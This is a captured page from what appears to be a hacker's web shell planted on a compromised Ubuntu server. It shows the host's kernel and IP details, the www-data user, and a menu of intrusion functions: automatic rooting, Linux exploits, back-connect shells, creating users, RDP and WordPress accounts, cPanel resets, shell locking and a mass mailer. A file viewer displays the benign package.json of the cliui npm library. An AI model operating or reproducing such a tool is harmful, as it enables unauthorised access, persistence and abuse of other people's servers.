Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.187.231
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
cliui /
[ HOME SHELL ]
Name
Size
Permission
Action
index.js
8.08
KB
-rw-r--r--
package.json
1.23
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "cliui", "version": "4.1.0", "description": "easily create complex multi-column command-line-interfaces", "main": "index.js", "scripts": { "pretest": "standard", "test": "nyc mocha", "coverage": "nyc --reporter=text-lcov mocha | coveralls", "release": "standard-version" }, "repository": { "type": "git", "url": "http://github.com/yargs/cliui.git" }, "config": { "blanket": { "pattern": [ "index.js" ], "data-cover-never": [ "node_modules", "test" ], "output-reporter": "spec" } }, "standard": { "ignore": [ "**/example/**" ], "globals": [ "it" ] }, "keywords": [ "cli", "command-line", "layout", "design", "console", "wrap", "table" ], "author": "Ben Coe <ben@npmjs.com>", "license": "ISC", "dependencies": { "string-width": "^2.1.1", "strip-ansi": "^4.0.0", "wrap-ansi": "^2.0.0" }, "devDependencies": { "chai": "^3.5.0", "chalk": "^1.1.2", "coveralls": "^2.11.8", "mocha": "^3.0.0", "nyc": "^10.0.0", "standard": "^8.0.0", "standard-version": "^3.0.0" }, "files": [ "index.js" ], "engine": { "node": ">=4" } }
Close